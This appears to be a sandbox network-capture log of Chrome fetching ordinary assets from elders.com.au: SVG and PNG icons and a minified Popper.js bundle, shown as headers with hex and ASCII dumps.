                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC583INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:51 GMT
                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                            last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                            etag: W/"967-62599fcdf98c0-gzip"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            Age: 7976
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-dfw-kdfw8210127-DFW
                                                                                                                                                                                                            x-cache: HIT
                                                                                                                                                                                                            x-timer: S1730248629.155532,VS0,VS0,VE4
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b0330b086c4f-DFW
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC786INData Raw: 39 36 37 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 39 20 37 2e 35 43 39 20 37 2e 33 36 37 33 39 20 39 2e 30 35 32 36 38 20 37 2e 32 34 30 32 31 20 39 2e 31 34 36 34 35 20 37 2e 31 34 36 34 35 43 39 2e 32 34 30 32 31 20 37 2e 30 35 32 36 38 20 39 2e 33 36 37 33 39 20 37 20 39 2e 35 20 37 48 31 37 2e 35 43 31 37 2e 36 33 32 36 20 37 20 31 37 2e 37 35 39 38 20 37
                                                                                                                                                                                                            Data Ascii: 967<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M9 7.5C9 7.36739 9.05268 7.24021 9.14645 7.14645C9.24021 7.05268 9.36739 7 9.5 7H17.5C17.6326 7 17.7598 7
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC1369INData Raw: 39 20 31 36 2e 35 56 37 2e 35 43 31 39 20 37 2e 31 30 32 31 38 20 31 38 2e 38 34 32 20 36 2e 37 32 30 36 34 20 31 38 2e 35 36 30 37 20 36 2e 34 33 39 33 34 43 31 38 2e 32 37 39 34 20 36 2e 31 35 38 30 34 20 31 37 2e 38 39 37 38 20 36 20 31 37 2e 35 20 36 48 39 2e 35 43 39 2e 31 30 32 31 38 20 36 20 38 2e 37 32 30 36 34 20 36 2e 31 35 38 30 34 20 38 2e 34 33 39 33 34 20 36 2e 34 33 39 33 34 43 38 2e 31 35 38 30 34 20 36 2e 37 32 30 36 34 20 38 20 37 2e 31 30 32 31 38 20 38 20 37 2e 35 56 39 2e 35 43 38 20 39 2e 36 33 32 36 31 20 38 2e 30 35 32 36 38 20 39 2e 37 35 39 37 39 20 38 2e 31 34 36 34 35 20 39 2e 38 35 33 35 35 43 38 2e 32 34 30 32 31 20 39 2e 39 34 37 33 32 20 38 2e 33 36 37 33 39 20 31 30 20 38 2e 35 20 31 30 43 38 2e 36 33 32 36 31 20 31 30 20
                                                                                                                                                                                                            Data Ascii: 9 16.5V7.5C19 7.10218 18.842 6.72064 18.5607 6.43934C18.2794 6.15804 17.8978 6 17.5 6H9.5C9.10218 6 8.72064 6.15804 8.43934 6.43934C8.15804 6.72064 8 7.10218 8 7.5V9.5C8 9.63261 8.05268 9.75979 8.14645 9.85355C8.24021 9.94732 8.36739 10 8.5 10C8.63261 10
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC259INData Raw: 33 30 37 34 20 31 31 2e 31 34 36 20 31 35 2e 33 35 33 39 43 31 31 2e 31 39 32 35 20 31 35 2e 34 30 30 34 20 31 31 2e 32 34 37 37 20 31 35 2e 34 33 37 33 20 31 31 2e 33 30 38 34 20 31 35 2e 34 36 32 34 43 31 31 2e 33 36 39 32 20 31 35 2e 34 38 37 36 20 31 31 2e 34 33 34 33 20 31 35 2e 35 30 30 35 20 31 31 2e 35 20 31 35 2e 35 30 30 35 43 31 31 2e 35 36 35 37 20 31 35 2e 35 30 30 35 20 31 31 2e 36 33 30 38 20 31 35 2e 34 38 37 36 20 31 31 2e 36 39 31 36 20 31 35 2e 34 36 32 34 43 31 31 2e 37 35 32 33 20 31 35 2e 34 33 37 33 20 31 31 2e 38 30 37 35 20 31 35 2e 34 30 30 34 20 31 31 2e 38 35 34 20 31 35 2e 33 35 33 39 4c 31 34 2e 38 35 34 20 31 32 2e 33 35 33 39 56 31 32 2e 33 35 33 39 5a 22 20 66 69 6c 6c 3d 22 23 44 32 31 45 32 34 22 2f 3e 0a 3c 2f 73 76 67
                                                                                                                                                                                                            Data Ascii: 3074 11.146 15.3539C11.1925 15.4004 11.2477 15.4373 11.3084 15.4624C11.3692 15.4876 11.4343 15.5005 11.5 15.5005C11.5657 15.5005 11.6308 15.4876 11.6916 15.4624C11.7523 15.4373 11.8075 15.4004 11.854 15.3539L14.854 12.3539V12.3539Z" fill="#D21E24"/></svg
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            111192.168.2.457786172.66.0.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC428OUTGET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-right-chevron-red.svg HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC586INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:52 GMT
                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                            last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                            etag: W/"c6-62599fcdf98c0-gzip"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            Age: 42556
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-dfw-kdfw8210024-DFW
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1730285984.525850,VS0,VS0,VE684
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b0349f774662-DFW
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC204INData Raw: 63 36 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 37 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 20 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 35 2e 30 35 38 38 35 20 36 4c 30 20 31 2e 31 30 30 33 35 4c 31 2e 31 33 36 33 34 20 30 4c 37 20 36 4c 31 2e 31 33 36 33 34 20 31 32 4c 30 20 31 30 2e 38 39 39 37 4c 35 2e 30 35 38 38 35 20 36 5a 22 20 66 69 6c 6c 3d 22 23 44 32 31 45 32 34 22 2f 3e 0a 3c 2f 73 76 67 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: c6<svg width="7" height="12" viewBox="0 0 7 12" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M5.05885 6L0 1.10035L1.13634 0L7 6L1.13634 12L0 10.8997L5.05885 6Z" fill="#D21E24"/></svg>
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            112192.168.2.457785162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC629OUTGET /content/dam/eld/icons---logos/icons/icon_farm_supplies.png HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC710INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:53 GMT
                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                            Content-Length: 443
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            last-modified: Wed, 08 Feb 2023 05:11:19 GMT
                                                                                                                                                                                                            etag: "0x8DB0992E9D1A95B"
                                                                                                                                                                                                            content-disposition: attachment; filename="icon_farm_supplies.png"; filename*=UTF-8''icon_farm_supplies.png
                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                            Cache-Control: public, max-age=86400, immutable
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            x-vhost: publish
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-lax-kwhp1940101-LAX
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1721956918.168810,VS0,VS0,VE1195
                                                                                                                                                                                                            CF-Cache-Status: REVALIDATED
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b0349a9f2e5f-DFW
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC443INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1e 00 00 00 1e 08 06 00 00 00 3b 30 ae a2 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 01 6d 49 44 41 54 48 89 ed 97 cd 4d c4 30 10 85 1f 88 7b e8 c0 7b c9 31 da 74 00 1d b0 1d 40 09 5b c2 96 40 07 50 02 1d b0 74 b0 28 c7 5c 36 1d 2c 15 04 8d 34 2b 45 de 79 8e 3d 90 0b e2 49 51 94 f8 e7 b3 c7 33 63 fb 6a 1c 47 78 d4 85 ba 95 66 cd d0 1f 3c ed 29 b8 0b f5 2d 80 1d 80 56 7f ed 01 1c f4 7b 0b a0 d2 ff 83 d6 3b 01 b8 9f d4 7f 6b 86 fe 99 81 6f 66 06 f6 34 01 dc 91 3a 01 c0 0b 29 a3 e0 6b 56 d0 0c bd cc 60 33 33 30 a6 2f 1d 34 15 05 ab 36 da 49 a9 ce 66 77 83 db 89 a9 4b 14 26 6b ed 02 ef 1c 50 a8 95 92 6d 97 02 57 ea f9 54 a9 70 92 35 7a 77 82 a1 b3 5e a9 93 5e 28 35 e3 a4 57 66
                                                                                                                                                                                                            Data Ascii: PNGIHDR;0pHYs~mIDATHM0{{1t@[@Pt(\6,4+Ey=IQ3cjGxf<)-V{;kof4:)kV`330/46IfwK&kPmWTp5zw^^(5Wf


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            113192.168.2.457791172.66.0.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC482OUTGET /content/dam/eld/icons---logos/icons/Livestock.png HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            Cookie: AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CvVersion%7C5.5.0
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC559INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:52 GMT
                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                            Content-Length: 817
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            last-modified: Tue, 22 Nov 2022 06:53:37 GMT
                                                                                                                                                                                                            etag: "331-5ee09a19b9e40"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-dfw-kdfw8210121-DFW
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1730868237.743427,VS0,VS0,VE791
                                                                                                                                                                                                            Cache-Control: max-age=86400
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 2755
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b0359f5b7d54-DFW
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC810INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 1b 08 06 00 00 00 1d c7 8d 9a 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 02 c6 49 44 41 54 78 01 c5 56 4b 52 db 40 10 ed 9e 11 d9 a4 42 b4 4f e1 9a 2a f0 26 0b b0 4e 00 3e 41 e0 04 21 27 80 9c 20 e4 04 e0 13 00 27 80 1b c4 9c c0 c2 2c a1 8a 21 24 55 d9 a1 7c 36 c1 9a e9 74 5b 52 61 1b 64 e4 60 27 af ca fa 78 a6 d5 6f fa 8f 67 b5 fa 16 11 ad 01 60 02 00 27 00 f4 16 10 d6 10 20 4e 6f d3 8d e8 9b b5 1d 63 0c 24 90 44 89 95 3d 53 05 76 6b 8b 97 7c 33 25 eb 09 10 c4 42 48 5e 08 e0 fd ca e7 8b 3d 98 22 14 01 b6 c6 ac 87 85 72 01 12 4d df 02 72 39 ad 2d ee 21 e0 d6 23 7b c5 1a 6d 42
                                                                                                                                                                                                            Data Ascii: PNGIHDR pHYssRGBgAMAaIDATxVKR@BO*&N>A!' ',!$U|6t[Rad`'xog`' Noc$D=Svk|3%BH^="rMr9-!#{mB
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC7INData Raw: 45 4e 44 ae 42 60 82
                                                                                                                                                                                                            Data Ascii: ENDB`


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            114192.168.2.457789162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC622OUTGET /etc.clientlibs/aap2/aap2-core/clientlibs/v2/ax-fx-clientlibs-body.lc-977e7ec6e7e29a59f7dfd9cd0ac2f4b3-lc.min.js HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC617INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:52 GMT
                                                                                                                                                                                                            Content-Type: application/javascript;charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            cache-control: public, max-age=2592000, immutable
                                                                                                                                                                                                            last-modified: Thu, 29 Feb 2024 11:53:51 GMT
                                                                                                                                                                                                            etag: W/"34d7f-2386f26fb1bdc0-gzip"
                                                                                                                                                                                                            x-vhost: publish
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Age: 444885
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31557600
                                                                                                                                                                                                            X-Served-By: cache-dfw-kdfw8210049-DFW
                                                                                                                                                                                                            X-Cache: HIT
                                                                                                                                                                                                            X-Timer: S1709603799.642047,VS0,VS0,VE4
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b0358c443ab9-DFW
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC752INData Raw: 37 64 33 35 0d 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 36 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 0a 20 50 65 72 6d 69 73 73 69 6f 6e 20 69 73 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 2c 20 66 72 65 65 20 6f 66 20 63 68 61 72 67 65 2c 20 74 6f 20 61 6e 79 20 70 65 72 73 6f 6e 20 6f 62 74 61 69 6e 69 6e 67 20 61 20 63 6f 70 79 0a 20 6f 66 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 61 6e 64 20 61 73 73 6f 63 69 61 74 65 64 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 20 66 69 6c 65 73 20 28 74 68 65 20 22 53 6f 66 74 77 61 72 65 22 29 2c 20 74 6f 20 64 65 61 6c 0a 20 69 6e 20 74 68 65 20 53 6f 66 74 77 61 72 65 20 77 69 74 68 6f 75 74 20 72 65 73 74 72 69 63 74 69
                                                                                                                                                                                                            Data Ascii: 7d35/* Copyright (c) 2016 Federico Zivolo and contributors Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restricti
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 20 57 41 52 52 41 4e 54 49 45 53 20 4f 46 20 4d 45 52 43 48 41 4e 54 41 42 49 4c 49 54 59 2c 0a 20 46 49 54 4e 45 53 53 20 46 4f 52 20 41 20 50 41 52 54 49 43 55 4c 41 52 20 50 55 52 50 4f 53 45 20 41 4e 44 20 4e 4f 4e 49 4e 46 52 49 4e 47 45 4d 45 4e 54 2e 20 49 4e 20 4e 4f 20 45 56 45 4e 54 20 53 48 41 4c 4c 20 54 48 45 0a 20 41 55 54 48 4f 52 53 20 4f 52 20 43 4f 50 59 52 49 47 48 54 20 48 4f 4c 44 45 52 53 20 42 45 20 4c 49 41 42 4c 45 20 46 4f 52 20 41 4e 59 20 43 4c 41 49 4d 2c 20 44 41 4d 41 47 45 53 20 4f 52 20 4f 54 48 45 52 0a 20 4c 49 41 42 49 4c 49 54 59 2c 20 57 48 45 54 48 45 52 20 49 4e 20 41 4e 20 41 43 54 49 4f 4e 20 4f 46 20 43 4f 4e 54 52 41 43 54 2c 20 54 4f 52 54 20 4f 52 20 4f 54 48 45 52 57 49 53 45 2c 20 41 52 49 53 49 4e 47 20 46
                                                                                                                                                                                                            Data Ascii: WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING F
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 5b 75 5d 29 72 65 74 75 72 6e 20 58 5b 75 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 4d 3d 58 5b 75 5d 3d 7b 69 3a 75 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 73 61 5b 75 5d 2e 63 61 6c 6c 28 4d 2e 65 78 70 6f 72 74 73 2c 4d 2c 4d 2e 65 78 70 6f 72 74 73 2c 43 29 2c 4d 2e 6c 3d 21 30 2c 4d 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 58 3d 7b 7d 3b 43 2e 6d 3d 73 61 3b 43 2e 63 3d 58 3b 43 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 75 2c 4d 2c 6c 61 29 7b 43 2e 6f 28 75 2c 4d 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 75 2c 4d 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 6c 61 7d 29 7d 3b 43 2e 72 3d 66 75 6e 63 74 69 6f 6e 28 75 29 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f
                                                                                                                                                                                                            Data Ascii: [u])return X[u].exports;var M=X[u]={i:u,l:!1,exports:{}};return sa[u].call(M.exports,M,M.exports,C),M.l=!0,M.exports}var X={};C.m=sa;C.c=X;C.d=function(u,M,la){C.o(u,M)||Object.defineProperty(u,M,{enumerable:!0,get:la})};C.r=function(u){"undefined"!=typeo
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 6c 6f 77 58 29 3f 66 3a 69 61 28 6c 61 28 66 29 29 7d 66 75 6e 63 74 69 6f 6e 20 74 61 28 66 29 7b 72 65 74 75 72 6e 20 31 31 3d 3d 3d 66 3f 76 64 3a 31 30 3d 3d 3d 66 3f 77 64 3a 76 64 7c 7c 77 64 7d 66 75 6e 63 74 69 6f 6e 20 71 61 28 66 29 7b 69 66 28 21 66 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 66 6f 72 28 76 61 72 20 6b 3d 0a 74 61 28 31 30 29 3f 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3a 6e 75 6c 6c 2c 64 3d 66 2e 6f 66 66 73 65 74 50 61 72 65 6e 74 7c 7c 6e 75 6c 6c 3b 64 3d 3d 3d 6b 26 26 66 2e 6e 65 78 74 45 6c 65 6d 65 6e 74 53 69 62 6c 69 6e 67 3b 29 64 3d 28 66 3d 66 2e 6e 65 78 74 45 6c 65 6d 65 6e 74 53 69 62 6c 69 6e 67 29 2e 6f 66 66 73 65 74 50 61 72 65 6e 74 3b 72 65 74 75 72 6e
                                                                                                                                                                                                            Data Ascii: lowX)?f:ia(la(f))}function ta(f){return 11===f?vd:10===f?wd:vd||wd}function qa(f){if(!f)return document.documentElement;for(var k=ta(10)?document.body:null,d=f.offsetParent||null;d===k&&f.nextElementSibling;)d=(f=f.nextElementSibling).offsetParent;return
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 65 66 74 22 3a 22 54 6f 70 22 3b 76 61 72 20 64 3d 22 4c 65 66 74 22 3d 3d 3d 6b 3f 22 52 69 67 68 74 22 3a 22 42 6f 74 74 6f 6d 22 3b 72 65 74 75 72 6e 20 70 61 72 73 65 46 6c 6f 61 74 28 66 5b 22 62 6f 72 64 65 72 22 2b 6b 2b 22 57 69 64 74 68 22 5d 29 2b 70 61 72 73 65 46 6c 6f 61 74 28 66 5b 22 62 6f 72 64 65 72 22 2b 64 2b 22 57 69 64 74 68 22 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 56 62 28 66 2c 6b 2c 64 2c 67 29 7b 72 65 74 75 72 6e 20 4d 61 74 68 2e 6d 61 78 28 6b 5b 22 6f 66 66 73 65 74 22 2b 66 5d 2c 6b 5b 22 73 63 72 6f 6c 6c 22 2b 66 5d 2c 64 5b 22 63 6c 69 65 6e 74 22 2b 66 5d 2c 64 5b 22 6f 66 66 73 65 74 22 2b 66 5d 2c 64 5b 22 73 63 72 6f 6c 6c 22 2b 66 5d 2c 74 61 28 31 30 29 3f 70 61 72 73 65 49 6e 74 28 64 5b 22 6f 66 66 73 65 74 22 2b 66
                                                                                                                                                                                                            Data Ascii: eft":"Top";var d="Left"===k?"Right":"Bottom";return parseFloat(f["border"+k+"Width"])+parseFloat(f["border"+d+"Width"])}function Vb(f,k,d,g){return Math.max(k["offset"+f],k["scroll"+f],d["client"+f],d["offset"+f],d["scroll"+f],ta(10)?parseInt(d["offset"+f
